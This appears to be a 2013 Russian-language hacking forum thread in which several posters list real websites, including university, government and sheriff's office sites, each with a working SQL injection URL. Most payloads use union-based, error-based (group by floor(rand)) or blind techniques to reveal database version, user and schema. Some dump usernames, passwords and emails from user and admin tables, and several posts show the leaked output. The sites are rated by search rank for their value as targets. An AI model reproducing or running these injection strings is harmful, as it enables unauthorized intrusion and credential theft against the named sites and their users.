http://web3.unt[dot]edu/ielilab/browse.php?catid=8 %SQL%
http://ugcs.caltech[dot]edu/~alexf/tables.php?userID=1 %SQL%
Blaizers
13.07.2013, 13:44
http://gagra-picunda.ru/page.php?id=2&np=3&obj=-1+and+1=1+union+select+1,2,3,versioN(),5,6,7,8,9--
траф 1к
GOV
Code:
http://www.stc.gov.ae/en/transport-intercity-routes-result.php?id=-112+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7,8,9,10,11,12,13--
5.1.70-CLL:STCGOVAE_STC@LOCALHOST:STCGOVAE_DATA
pharm_all
13.07.2013, 22:17
Edu's
http://www.uh[dot]edu/about/tier-one/faculty-opportunities/awards-details.php?id=37 %SQL%
http://www.katrinalist.columbia[dot]edu/details.php?id=242 %SQL%
http://www.engr.utk[dot]edu/~cee/announcements/details.php?id=27 %SQL%
http://www.earth.columbia[dot]edu/eidirectory/displayuser.php?userid=626 %SQL%
pharm_all said:
Edu's
Code:
http://www.uh.edu/about/tier-one/faculty-opportunities/awards-details.php?id=-37+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5--
5.1.69:facultyaward@hwfwrv001.web.e.uh.edu:faculty awards
Code:
http://www.katrinalist.columbia.edu/details.php?id=-242+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
4.1.22-log:katrina_user@192.168.100.10:katrina
Code:
http://www.engr.utk.edu/~cee/announcements/details.php?id=-27+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),user(),database()),8,9,10,11,12,13,14,15--
5.0.95-log:civil@babel.usg.utk.edu:civil
http://
www.aboutrsi.org
/history.php?ID=-13+union+select+1,(select(@x)from(select (@x:=0x00),(select(0)from(caadrsdb.users)where(0x0 0)in(@x:=concat(@x,0x3c62723e,username,0x3a,passwo rd))))x),3,4,5,6,7 --+
==========================================
http://
www.animalcentury.com
/rubric.php?id=-9+union+select+1,concat(database(),0x3a,user(),0x3 a,version()),3,4,5,6,7--+
==========================================
http://
www.svite.lt
/rubric.php?id=-71+union+select+1,2,3,4,5,6,7,8,9,(select(@x)from( select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))x),11,12,13,14,15,16,17 --+
==========================================
pr=4
http://
www.afu.org.ua
/rubric.php?id=-21+union+select+concat(user(),0x3a,version(),0x3a, database()),2,3,4,5,6,7 --+
==========================================
Code:
http://cgl-gabon.com/?p=ref&cat=2&scat=5&ref=-6+union+select+1,2,3,4,5,concat_ws(0x3a,version(), user(),database()),7,8,9,10--
1111
http://www.shar-e. com/newsDetail.php?id=-78/**/union/**/select/**/1,concat_ws(user(),database(),version() ),3,4,5,6--
http://www.oceansurf.ca/gallery.php?id=-16/**/union/**/ select/**/1 ,concat_ws(user(),database(),version())--
http://www.me lbournefineart.com.au/gallery.php?id=-18/**/union/** /select/**/1,concat_ws(user(),database(),version()),3,4,5--
http://ww w.si mplytobago.co.uk/gallery.php?id=-47/**/union/**/s elect/**/1,2 ,3,4,5,concat_ws(user(),database(),version()),7--
http://www.cor doga nclark.com/newsitem.php?id=-8/**/union/* */select/**/1,2,3,concat_ws(user(),database(),version()) ,5,6--
http://www.sdarabia.com/preview_staff.php?staff_id=-36/ **/unio n/* */select/**/1,c oncat_ws(user(),database(),version()),3,4,5,6--
http://www.the fireworksfirm.co.uk/new sitem.php?id=-220/**/ union/**/select/**/1,2,3,4,5,concat_ws(user(),database(),version()) ,7,8,9--
http://www.bailey -caravans.co.uk/information-centre/latest-news/newsitem.php?recordid=-225/** /union/**/select/**/1,concat_ws(user(),database(),version()),3,4,5,6,7 ,8,9,10,11,12,13--
http://www.eastsom ersetrailway.com /newsitem.php?item=-16/**/union/**/s elect/**/1,concat_w s(user(),database(),version()),3,4,5,6,7,8,9,10--
http://www.faresav er.co.uk/newsitem.php?i=-9462599/**/union/ **/select/**/1,2,3,concat_ws(user(),database(),version()),5,6--
http://www.baileyofbristol.co.uk/whats-new/latest-news/newsit em.php?recordid=-290/**/union/**/select/**/1,concat_ws(user(),database(),version()),3, 4,5,6,7,8,9,10,11,12,13--
http://www. bradleys-blyth.co.uk/readne ws.php? newsid=-25/**/u nion/**/select/**/1,2,user(),4,5,6,7,8,9--
http://mostaloc alcouncil .com/readnews.php?id=-32/**/union/* */select/**/1,concat_ws(user(),database(),version()),3,4,5--
http://www .coreycoxmusic.com/newsitem.php?id=-4/**/un ion/**/select/**/1,2,concat_ws(user(),database(),version()),4,5--
http://www.irishsanghatrust.ie/news.php?id=-33/**/un ion/**/s elect/**/1,concat_ws(user(),database(),version()),3,4,5, 6,7,8,9,10,11,12 ,13,14,15,16,17,18--
http://www.pt.ncku.edu.tw/newsone.php?newS o=-36/**/union /**/select/**/1, 2,concat_ws(user(),database(),version()),4,5,6,7--
1111
http://web-job.ru/about_vakansii.php?id=5022-999.9+union+select+1,2,3,4,5,6,7,8-- [0:0]
http://pr-ic.ru/sel.php/?url=brocker.pro-999.9+union+select+1,2,3,4,5,6-- [0:0]
http://rating-brokers.com/index.php?option=com_videoflow&task=play&id=659-999.9+union+select+1,2,3,4-- [0:0]
http://imperiafilm.ru/details.php?id=183-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18-- [0:0]
http://www.martial-arts.com.ua/view_news.php?id=269-999.9+union+select+1,2,3,4,5,6,7,8-- [0:0]
http://fifa13center.ru/modules/forum/topic.php?id=2&last=Y-999.9+union+select+1,2,3,4,5,6-- [0:0]
http://ramu.ru/news-details.php?id=7409-999.9+union+select+1,2,3,4-- [0:0]
http://www.star.poltava.ua/index.php?id=2&set_lang=ru-999.9+union+select+1,2,3,4-- [0:0]
http://fifa4stars.ru/game.php?id=46192-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16-- [0:0]
http://mashintop.ru/articles.php?id=24-999.9+union+select+1,2,3,4,5,6,7,8,9-- [0:0]
http://dro4a.org/view_video.php?id=762-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- [0:0]
http://www.tit.by/stat.php?id=12863-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24-- [0:0]
http://www.news-ru.com/index.php?id=80227-999.9+union+select+1,2,3,4,5,6,7-- [0:0]
http://www.orikipoteka.ru/menu.php?id=47-999.9+union+select+1,2,3,4,5,6,7,8,9-- [0:0]
http://ipoteka.obmen.ru/articles.php?id=2-999.9+union+select+1,2,3,4,5,6,7,8,9-- [0:0]
pr=3
http://
www.adhesia.be
/template.php?t=nl&m=digimagazines&f=laatste&id=-84'+union+select+1,2,version(),4,5,6,group_concat( table_name),8,9+from+information_schema.tables+whe re+table_schema=database() --+
==========================================
pr=1
http://
www.lagerwerf.nl
/public.php?ID=7426+or+1+group+by+concat((select+ve rsion()),0x3a,database(),0x3a,user(),floor(rand(0) *2))+having+max(0) --+
==========================================
pr=3
http://
www.hfc-chemicals.com
/public.php?id=-4+union+select+1,2,(select(@x)from( select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))x),4 --+
==========================================
http://www.nassnig. org/nass/news.php?id=-452/**/union/**/select/**/1, 2,3,4,concat_ws(user(),database(),version()),6,7,8--
http://www.threedomsolutions.co.uk/news.php?id=-54/**/union/* */select/**/1,2,concat_ws(user() database(),version()),4,5,6,7--
http://www.vital-technology.net/News.php?ID=-124/**/u nion/**/select/**/1,2,3,concat_ws(user(),database(),version()),5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24--
http://charliemars.com/news.php?id=-165/**/union /**/select/**/1,2,concat_ws(user(),data base(),version()),4,5,6--
http://www.nightgallery.ca/event.php?id=-78/**/union/**/s elect/**/1,concat_ws(user(),database(),version()),3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24,25,26,27,28,29--
http://www.intergeneration.be/contactmanager/preview.php?id=-2/**/union/**/s elect/**/1,2,3,4,5,6,7,8,concat_ws(us er(),database(),version()),10,11,12--
http://www.zigzagweeklynews.com/opinions.php?ID=-2496/**/union/**/select/**/1,conc at_ws(user(),database(),version()),3 ,4,5,6,7,8,9,10,11,12--
http://www.groupeone.eu/preview.php?id=-46/**/union/**/ select/**/1,concat_ws(user(),database(), version())--
http://www.mamacassng.com/pages.php?id=-10/**/unio n/**/select/**/1,concat_ws(user() ,database(),version()),3,4,5,6,7,8,9,10--
1111
pr=3
http://
www.glenlakesrealty.com
/public.php?id=-3'+union+select+1,2,3,4,5,6,7,8,9,10,group_concat( 0x3c62723e,name,char(58),pass),12,13,14,15,16,vers ion(),18,19+from+residents --+
==========================================
http://
www.riverariveralaw.com
/Spanish/publication.php?id=-4'+union+select+1,(select(@a)from( select (@a:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@a:=c oncat(@a,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),3,4,5 --+
==========================================
http://
www.nlpvf.nl
/book/sign.php?id=-50+union+select+1,2,version(),4,5,(select(@a)from( select (@a:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@a:=c oncat(@a,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),7,8,9,10,11,12,13,14 --+
==========================================
http://
www.franklinoutdoor.com
/sign.php?id=-31+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27 --+
==========================================
http://
www.poshuk-rc.com
/publication.php?id=48)+or+1+group+by+concat((selec t+version()),0x3a,database(),0x3a,user(),floor(ran d(0)*2))+having+max(0) --+
==========================================
http://
www.docudisp.ch
/en/home/publication.php?id=-609+union+select+1,group_concat(table_name),3,vers ion(),5,6,7,8,9,10,11,12,13,14,15,16+from+informat ion_schema.tables+where+table_schema=database() --+
==========================================
http://
www.cordilleranorth.com
/publication.php?ID=-7+union+select+1,2,3,4,version(),6,7,8,9,10,(selec t(@a)from( select (@a:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@a:=c oncat(@a,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),12,13 --+
==========================================
http://
www.sastm.org.za
/publication.php?id=-14+union+select+group_concat(user,0x3a,pass),2,3,4 ,5,6,7,8+from+users --+
==========================================
HAHAHA.DE
Mysql Error-Based Dublicate entry query: version()
Code:
http://www.hahaha.de/?v=1%22%20AND%20%28SELECT%205546%20FROM%28SELECT%2 0COUNT%28%2A%29%2CCONCAT%280x7169737271%2C%28MID%2 8%28IFNULL%28CAST%28version%28%29%20AS%20CHAR%29%2 C0x20%29%29%2C1%2C50%29%29%2C0x7170696871%2CFLOOR% 28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHE MA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20 %22JzYK%22%3D%22JzYK
output:
Array ( [0] => Fehler in der Abfrage.Duplicate entry 'qisrq5.1.66-0+squeeze1qpihq1' for key 'group_key' )
5.1.66-0+squeeze1
Code:
http://www.skikarte.si/buy.php?id=-57+union+select+1,concat_ws(0x3a,version(),user(), database()),3--
UP
pr = 2
http://
www.u-need.de
/main.php?id=33+and+(select 1 from(select count(*),concat(version(),0x3a,user(),0x3a,databas e(),floor(rand(0)*2))x from information_schema.tables group by x)antichat) --+
==========================================
pr = 5 тиЦ = 10
http://
www.wdcb.org
/programming/programs.php?id=17' and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)antichat) --+
==========================================
HTML:
http://segway-city.ru/accessories/acc.php?id=11111111+union+select+1,version%28%29,3 ,4,5,6,7,8,9,10,11,12 --
Unknowhacker
29.07.2013, 23:54
Code:
http://doska.crimeahouse.net/ind.php?pn=7&id_typ=6+union+select+1,password,user,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user
crimeaho_admin'@'localhost
Code:
http://www.wcasi.com/programs.php?id=-23+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8,9,101,11,12--
Code:
http://decoristick.ru/newsDetail.php?id=999999.9+union+all+select+0x7c,( select+concat(0x7c,(users.id),0x7c,(users.login),0 x7c,(users.password),0x7c,(users.email))+from+`u22 1699`.users+order+by+ID+limit+0,1),0x7c,0x7c,0x7c --
Unknowhacker
06.08.2013, 13:38
Code:
http://www.irishsanghatrust.ie/news.php?id=-33+union+select+1,version%28%29,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18+--+
5.0.83-community
Code:
http://www.z-man.com.au/articles.php?id=-158+union+select+1,2,3,4,user%28%29,6,7+--+
zmancom4_dbadmin@localhost
Code:
http://www.chwb.org/regional/news.php?id=63+union+select+version%28%29,2+--+
5.1.62-cll
el43.ru
PHP:
http://el43.ru/tovar_v.php?ID=13+or+1+group+by+concat((select+0x7 6657273696f6e73716c),0x00,floor(rand(0)*2))having+ min(0)+or+1--+
db 5 version
CY:20||PR:3
==================================================
www.tv-video.ru
PHP:
http://www.tv-video.ru/?action=goods_view&id=20+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:20||PR:1
==================================================
progman-soft.ru
PHP:
http://progman-soft.ru/helptxt/kadr/spr.php?id=30+or+1+group+by+concat((select+0x76657 273696f6e73716c),0x00,floor(rand(0)*2))having+min( 0)+or+1--+
db 5 version
CY:10||PR:1
==================================================
piknik.net.ua
PHP:
http://piknik.net.ua/?R=catalog&id=30+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:0
==================================================
nemaniak
08.08.2013, 14:10
eastbayscore.org PR-5 Alexa-49k
Code:
http://eastbayscore.org/event.php?parent_id=-22+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9+--+
Code:
5.0.96-log:scorecms@50.63.196.13:scorecms
entsweb.ltd.uk Alexa-474k
Code:
http://entsweb.ltd.uk/jobs.php?pageid=jobs&category=0+UNION+SELECT+1,2,3,4,5,6,7,8,9,0,concat _ws(0x3a,version(),user(),database()),12,13,14,15, 16,17,18+--+
Code:
5.0.96-community:entswebl_webouse@localhost:entswebl_webo
eqtraders.com Alexa-206k
Code:
http://eqtraders.com/items/show_item.php?item=-22833+UNION+SELECT+1,concat_ws(0x3a,version(),user (),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,5 0,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66, 67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83 ,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,1 00,101,102,103,104,105,106,107,108,109,110,111,112 ,113,114,115,116,117,118+--+
Code:
5.0.96-community:eqtrader_eqread@localhost:eqtrader_main
stluciesheriff.com Alexa-346k PR-5 шерифляндия
Code:
http://stluciesheriff.com/news_article.php?news_id=-741+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7+--+
Code:
5.1.24-rc-log:slcsheriff@pakhet.kattare.com:slcsheriff
www.prom-info.com
PHP:
http://www.prom-info.com/index.php?m=4&id=49+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:0
==================================================
www.lkm.kiev.ua
PHP:
http://www.lkm.kiev.ua/index.php?R=catalog&id=76+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:0
==================================================
cellfaktor.ru
PHP:
http://cellfaktor.ru/catalogtovar.php?cat=7&tov=31&id=120+or+1+group+by+concat((select+0x76657273696f 6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:0
==================================================
new.vodaspb.ru
PHP:
http://new.vodaspb.ru/note.php?id=131+or+1+group+by+concat((select+0x766 57273696f6e73716c),0x00,floor(rand(0)*2))having+mi n(0)+or+1--+
db 5 version
CY:20||PR:0
==================================================
cool-cook.ru
PHP:
http://cool-cook.ru/content/?id=145+or+1+group+by+concat((select+0x76657273696 f6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+ 1--+
db 5 version
CY:0||PR:1
==================================================
www.dcmagazine.ru
PHP:
http://www.dcmagazine.ru/journal.html?id=7%0D%0A+or+1+group+by+concat((sele ct+0x76657273696f6e73716c),0x00,floor(rand(0)*2))h aving+min(0)+or+1--+
db 5 version
CY:30||PR:2
==================================================
koral-chelny.ru
PHP:
http://koral-chelny.ru/otzyvy.php?id=3+or+1+group+by+concat((select+0x766 57273696f6e73716c),0x00,floor(rand(0)*2))having+mi n(0)+or+1--+
db 5 version
CY:10||PR:3
==================================================
http://
www.vila-verde.org.br
/not.php?id=272+union+select+1,2,3,4,5,6,concat(ver sion(),0x3a,user(),0x3a,database()),8,9,10,11,12,1 3,14,15 --+
==========================================
http://
www.wenhastonarchive.org.uk
/historynotes/note.php?id=-31'+union+select+1,2,3,version(),count(userid),6 from users --+
==========================================
http://
www.westcoastdreamca.com
/note.php?id=1+union+select+1,version(),(select(@x) from( select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),4,5,6 --+
==========================================
pr=3
http://
www.seriedelcaribe2013.com.mx
/detalle-not.php?id=709 and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)antichat) --+
==========================================
blind, mysql 5 версии, первая буква базы i
http://
www.ics.gencat.cat
/butlleti_medicaments/public/view-not.php?ID=7&idnot=58' and(substr(version(),1,2)=5) and '1 --+
==========================================
www.wgabus.ru
PHP:
http://www.wgabus.ru/?id=4+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 4 version
CY:60||PR:2
==================================================
www.lada110atricom.ru
PHP:
http://www.lada110atricom.ru/index.php?content=word_all&id=6+or+1+group+by+concat((select+0x76657273696f6e 73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:0
==================================================
soctech.ru
PHP:
http://soctech.ru/index.php?module=articles&file=article&id=1+and(select+1+from(select+count(*),concat((sel ect+0x76657273696f6e73716c),0x00,floor(rand(0)*2)) x+from+information_schema.tables+group+by+x)a)--+
db 5 version
CY:30||PR:1
==================================================
http://
www.aceas.co.in
/content.php?id=-9+/*!union*/+/*!select*/+1,2,3,version(),5,(/*!select*/(@x)from(/*!select*/(@x:=0x00),(/*!select*/(0)from(aceasco_aceas.adminmaster)where(0x00)in(@x :=concat(@x,0x3c62723e,adminUsername,0x3a,adminPas sword))))antichat),7,8,9,10,11,12,13,14,15 --+
==========================================
http://
www.chs.mak.ac.ug
/mumsa/content.php?id=-72+union+select+1,2,3,4,(select(@x)from(select (@x:=0x00),(select(0)from(mak_chs_mumsa.members)wh ere(0x00)in(@x:=concat(@x,0x3c62723e,email,0x3a,pa ss))))x),6,7,8,9 --+
==========================================
http://
www.es.romana.org
/not.php?n=42&s=8.0&ID=1&cita=-11+union+select+group_concat(table_name)+from+info rmation_schema.tables+where+table_schema=database( ) --+
==========================================
www.kso-ekb.ru
PHP:
http://www.kso-ekb.ru/service.php?id=2+or+1+group+by+concat((select+0x76 657273696f6e73716c),0x00,floor(rand(0)*2))having+m in(0)+or+1--+
db 5 version
CY:10||PR:0
==================================================
www.creasol.ru
PHP:
http://www.creasol.ru/print.php?id=5+or+1+group+by+concat((select+0x7665 7273696f6e73716c),0x00,floor(rand(0)*2))having+min (0)+or+1--+
db 5 version
CY:30||PR:3
==================================================
www.akrealt.kz
PHP:
http://www.akrealt.kz/index.php?page=premises_detail&id=5+or+1+group+by+concat((select+0x76657273696f6e 73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:1
==================================================
country.tj
PHP:
http://country.tj/index.php?c=news&id=3+or+1+group+by+concat((select+0x76657273696f6e 73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:2
==================================================
www.malikov-art.ru
PHP:
http://www.malikov-art.ru/projects.html?id=3+or+1+group+by+concat((select+0x 76657273696f6e73716c),0x00,floor(rand(0)*2))having +min(0)+or+1--+
db 5 version
CY:40||PR:3
==================================================
www.zhemkov.ru
PHP:
http://www.zhemkov.ru/index.php?rub=katalog&id=6+or+1+group+by+concat((select+0x76657273696f6e 73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:0||PR:0
==================================================
avi-mp3.ru
PHP:
http://avi-mp3.ru/go/?id=8+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:0||PR:3
==================================================
www.uezdniigorod.ru
PHP:
http://www.uezdniigorod.ru/article.php?id=9+or+1+group+by+concat((select+0x76 657273696f6e73716c),0x00,floor(rand(0)*2))having+m in(0)+or+1--+
db 5 version
CY:0||PR:2
==================================================
pyatoe.ru
PHP:
http://pyatoe.ru/feedback/otzyvy/?id=13+or+1+group+by+concat((select+0x76657273696f 6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:3
==================================================
Unknowhacker
09.08.2013, 22:42
Телеканал Tonis
Code:
http://www.tonis.ua/index.pl?page=forum&id=-871%27+union+select+1,2,3,4,5,6,version%28%29,8+--+
5.1.66-0+squeeze1-log
Code:
http://www.henryyanart.com/product.php?id=-1+union+select+1,concat_ws(0x3a,ver sion(),user(),database()),3,4,5,6,7,8,9,10,11--
www.pyatoe.ru
PHP:
http://www.pyatoe.ru/feedback/otzyvy/?id=15+or+1+group+by+concat((select+0x76657273696f 6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:3
==================================================
elisavetgrad.ho.ua
PHP:
http://elisavetgrad.ho.ua/View_video.php?id=17+or+1+group+by+concat((select+ 0x76657273696f6e73716c),0x00,floor(rand(0)*2))havi ng+min(0)+or+1--+
db 5 version
CY:0||PR:2
==================================================
www.atamura.kz
PHP:
http://www.atamura.kz/view_news.php?id=20+or+1+group+by+concat((select+0 x76657273696f6e73716c),0x00,floor(rand(0)*2))havin g+min(0)+or+1--+
db 5 version
CY:20||PR:1
==================================================
soyuzpisateley.ru
PHP:
http://piknik.net.ua/?R=catalog&id=30+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:400||PR:5
==================================================
www.citymt.ru
PHP:
http://www.citymt.ru/product/firm.php?id=1+or+1+group+by+concat((select+0x76657 273696f6e73716c),0x00,floor(rand(0)*2))having+min( 0)+or+1--+
db 5 version
CY:10||PR:2
==================================================
www.clip-touristic.com
PHP:
http://www.clip-touristic.com/index.php?id=28&tour_id=194+or+1+group+by+concat((select+0x7665727 3696f6e73716c),0x00,floor(rand(0)*2))having+min(0) +or+1--+
db 5 version
CY:10||PR:2
==================================================
www.teleorakul.com
PHP:
http://www.teleorakul.com/actor?id=32+or+1+group+by+concat((select+0x7665727 3696f6e73716c),0x00,floor(rand(0)*2))having+min(0) +or+1--+
db 5 version
CY:10||PR:1
==================================================
www.novotorg.ru
PHP:
http://www.novotorg.ru/catalog/?id=1+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:40||PR:2
==================================================
www.nord-lk.ru
PHP:
http://www.nord-lk.ru/kabinet_view.php?id=2+or+1+group+by+concat((select +0x76657273696f6e73716c),0x00,floor(rand(0)*2))hav ing+min(0)+or+1--+
db 5 version
CY:20||PR:1
==================================================
www.fabrica33.ru
PHP:
http://www.fabrica33.ru/index.php?id=2&cat=2+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:3
==================================================
ForcePush
10.08.2013, 18:28
http://
www.intro-inferno.com/news.php?id=180+AND+1=0+UNION+SELECT+1,user_name,3 ,4,5,user_pass,7,8,9+FROM+prod_intro_users
PR 2
www.mebeltoday.ru
PHP:
http://www.mebeltoday.ru/index.php?pl=rprice&id=5+or+1+group+by+concat((select+0x76657273696f6e 73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:1
==================================================
h-rod.ru
PHP:
http://h-rod.ru/teach.php?id=5+or+1+group+by+concat((select+0x7665 7273696f6e73716c),0x00,floor(rand(0)*2))having+min (0)+or+1--+
db 5 version
CY:20||PR:
==================================================
www.realtynavigator.ru
PHP:
http://www.realtynavigator.ru/index.php?whosend=detail&lng=ru&id=8+or+1+group+by+concat((select+0x76657273696f6e 73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:2
==================================================
Code:
http://webproverka.com/index-list_sites.php?sort=-23+union+select+1,concat_ws(0x3a,version(),user(), database(),0x4861636b6564206279205365706f),3,4,5,6 ,7,8--
www.minato.ru
PHP:
http://www.minato.ru/view.php?CID=4&ID=10+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:0||PR:1
==================================================
www.darsil.ru
PHP:
http://www.darsil.ru/?id=10+or+1+group+by+concat((select+0x76657273696f 6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:50||PR:2
==================================================
koral-kazan.ru
PHP:
http://koral-kazan.ru/otzyvy.php?id=10+or+1+group+by+concat((select+0x76 657273696f6e73716c),0x00,floor(rand(0)*2))having+m in(0)+or+1--+
db 5 version
CY:10||PR:3
==================================================
www.mezzatorre.it
PHP:
http://www.mezzatorre.it/ru/camera.php?id=10+or+1+group+by+concat((select+0x76 657273696f6e73716c),0x00,floor(rand(0)*2))having+m in(0)+or+1--+
db 5 version
CY:140||PR:3
==================================================
www.rusradiokrasnodar.ru
PHP:
http://www.rusradiokrasnodar.ru/gallery/?id=10+or+1+group+by+concat((select+0x76657273696f 6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:30||PR:1
==================================================
wszmk.ru
PHP:
http://wszmk.ru/index.php?id=13&ntable=46&pg_nom=43+or+1+group+by+concat((select+0x766572736 96f6e73716c),0x00,floor(rand(0)*2))having+min(0)+o r+1--+
db 5 version
CY:30||PR:3
==================================================
www.mallorcarusskaya.ru
PHP:
http://www.mallorcarusskaya.ru/playas.php?id=14+or+1+group+by+concat((select+0x76 657273696f6e73716c),0x00,floor(rand(0)*2))having+m in(0)+or+1--+
db 5 version
CY:0||PR:
==================================================
otpusk21.com
PHP:
http://otpusk21.com/modul.php?id=14+or+1+group+by+concat((select+0x766 57273696f6e73716c),0x00,floor(rand(0)*2))having+mi n(0)+or+1--+
db 5 version
CY:0||PR:3
==================================================
www.promind.ru
PHP:
http://www.promind.ru/shop/model.php?id=14+or+1+group+by+concat((select+0x766 57273696f6e73716c),0x00,floor(rand(0)*2))having+mi n(0)+or+1--+
db 5 version
CY:90||PR:2
==================================================
shop.duplet.com.ua
PHP:
http://shop.duplet.com.ua/index.php?R=catalog&id=15+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:0||PR:2
==================================================
www.discoverytour.ru
PHP:
http://www.discoverytour.ru/?id=16+or+1+group+by+concat((select+0x76657273696f 6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:20||PR:3
==================================================
www.ta-mp.ru
PHP:
http://www.ta-mp.ru/?page=tours&rem=sea&id=16+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:0||PR:0
==================================================
equator.ulagr.com
PHP:
http://equator.ulagr.com/articles/detail&id=16+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:0||PR:0
==================================================
sport-dom.com
PHP:
http://sport-dom.com/index.php?main_page=news_manager_all_news&id=16+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:0||PR:1
==================================================
3musk.ulagr.com
PHP:
http://3musk.ulagr.com/articles/detail&id=17+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:0||PR:0
==================================================
as-event.ru
PHP:
http://as-event.ru/blog/?id=19+or+1+group+by+concat((select+0x76657273696f 6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:20||PR:1
==================================================
www.severus-mebel.ru
PHP:
http://www.severus-mebel.ru/index.php?menu=catalog&task=select_item&groupID=0&cond=0&catID=0&ID=21&savedID=5&what=0&itemID=6291+or+1+group+by+concat((select+0x7665727 3696f6e73716c),0x00,floor(rand(0)*2))having+min(0) +or+1--+
db 5 version
CY:10||PR:0
==================================================
liderprice.com.ua
PHP:
http://liderprice.com.ua/list_goods.php?cid=8&id=21+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
